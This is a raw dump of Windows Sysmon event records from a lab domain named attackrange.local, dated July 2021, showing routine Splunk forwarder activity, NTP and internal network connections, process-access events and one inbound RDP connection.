SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local123ntpfalse10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal123ntp 23542300x8000000000000000806750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:43.017{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B51C57B0F9DC93F90207B69FC6730FE1,SHA256=7A25DBAE6D4260A309D3EAEC30E06A964DF3C3CA91B94955EF589A7BC16B203C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:44.915{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=87B77072FFB2C90FA5EAF25239CC4493,SHA256=0633CF3F00349F15EDFAE505F6333FE2F96C6B4117FF28F27CAF117B10EC5469,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.005{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-890.attackrange.local123ntpfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal123ntp 23542300x80000000000000001047163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:44.300{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAF684DD9E68F6257406D76590E4E0E1,SHA256=6EEB447589AFB17F598E4A065333A4BB4EC691CE68FD40B6B20F2E4EE45348B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:44.019{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=503D1A59F381A7252677923F8A813C19,SHA256=A1B380A1CA73AF7BF5DF4A2F2C24E68AB3769AE62D363F2844B683B13DD5DC43,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:37.699{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50957-false10.0.1.12-8000- 23542300x80000000000000001047166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:45.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=552CABD9353099089FCD5D012CB152C9,SHA256=C96C4AE954E42BF86086735004C6F4F9CE9E4DDB6549C71469BA8C196FD40468,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:44.261{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57205-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:45.019{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D93A04BCD86867F9EBC05B4FE4F5B75,SHA256=AD4BB6A12C6DB8596726D7C406EC1E1CFBD30271AD1CA1506C6D74D9AA11EEBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:46.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8BFEDDCB967CC59D77316A6845B59C8,SHA256=3A4D0F1ABAA47651C8DAD8B430C904A900FAB3E7DE41B92A89E270E8C77E8E26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:46.034{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC2CBB1FCFABDB09ACEE6B7C2E4D3E29,SHA256=A9E765347864626DA615DFC2266BA9E547353F880618030B30AB27ABB66A6FA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:47.346{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D18CCCD43FDA92E5F17672E07E7F55B8,SHA256=5B26CA78DDDA0BDA6562C062F62DF41BA3E4B774A12799622C6D78CC59912DAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:47.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=485BC0A44B3B1A58DE3F3544CD80F8DE,SHA256=D2ED25CE9C229FF2C883C011CA5E65B94EEC9E343E305069D55D68684F686F97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:48.364{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921D8DC94759CA863D16D9C8C1772A12,SHA256=59BFDE0699D3D86F7D8CA0E07FF614DBDF57A6D6D4F697BDA21DAEF512A05F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:48.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4FCE9ABB5A4C56C07635DF5345DB638,SHA256=72BD730DDBD95DC6517E03406D78FB2643E7D79B58EF7CA3534BE29F107EB22F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:49.382{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1D105172BCE1CF875A0DDD38D6953BF,SHA256=74AFCB256C1930B80C41C196BF7310C34DFB2C3124C16F1C7A97FAEA471A3DFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:49.191{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4E997892560AD22E61ED841ADC13FC1,SHA256=87C6C4FA6909FF71C2F8EC830F396DE56D288729E126C8C062DB7A2A178A3B08,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.982{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=60AA3CB50947AEEB7EE1898933287EAE,SHA256=7FA1C71AC469F91E91D660B7313A70A73D938EE201A7D96FDD540804CE99914B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A6-60EB-067D-00000000CF01}9596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001047191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:50.729{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3A6-60EB-067D-00000000CF01}9596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A6-60EB-067D-00000000CF01}9596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.716{466BC892-F3A6-60EB-067D-00000000CF01}9596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001047185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:42.796{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50958-false10.0.1.12-8000- 354300x80000000000000001047184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:42.250{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om56340-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001047183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.414{466BC892-F3A6-60EB-057D-00000000CF01}19402008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.383{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=148DD137428839E587335EFAF7577994,SHA256=8A89D255A740719988706D1B524DA8DD32CDB1EA5B2E4ADDB534F899CA11D01C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:49.401{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57206-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:50.191{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07DEF48B1CBEA9847130274313A19A73,SHA256=9E3CCD713ACF68ED4D6878C7661F295177729FA49375D2505D71B71A2CBE5AE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.267{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88B7A9A6F34AB5ABAE6618600C181EA4,SHA256=74EDC32F77B2A488E6445246D4EC3639EC11F6BF7BB537C267982F39F16C8804,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6B014ED0940D12E251C3B2E5AB5ED56,SHA256=BC0C0AE815C90B3E5DDBE7118A4C0C534E23D9DA5017381283B3B45CE2C910CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A6-60EB-057D-00000000CF01}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001047178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:50.199{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:50.199{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3A6-60EB-057D-00000000CF01}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A6-60EB-057D-00000000CF01}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 